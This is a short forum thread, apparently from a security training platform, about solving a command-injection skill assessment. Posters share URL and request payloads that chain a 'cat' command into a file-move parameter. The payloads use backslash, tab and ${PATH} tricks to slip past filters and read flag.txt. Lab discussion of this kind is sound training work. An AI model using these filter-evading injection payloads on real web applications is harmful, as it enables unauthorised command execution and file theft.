I solved Command Injection Skill Assessment with payload:
?to=&from=2380029473.txt%26c\a\t%09${PATH:0:1}flag.txt&finish=1&move=1
6 Likes
Thank you! but what is your logic to get there? When I try to inject I do a search for something random and then I try to inject here
ajax=true&content=poc&path=.&type=search%26c\a\t%09${PATH:0:1}flag.txt
How did you come to that conclusion of injecting into the URL and not into the burpsuite field and where did you find &from= because I only see /index.php?to=
Iâd like to add a â+â to the questions here 
â Iâm as well struggling to find the correct position to inject⌠I found the âfromâ parameter, by clicking around in the app⌠But I could not inject something really helping until now⌠ZAP tells me a few ârefrectedâ injections (as âi:dâ resulting in âError while moving: mv: cannot stat â/var/www/html/files/i:dâ: No such file or directoryâ)⌠not sure if that is of any help, since your question is a bit old now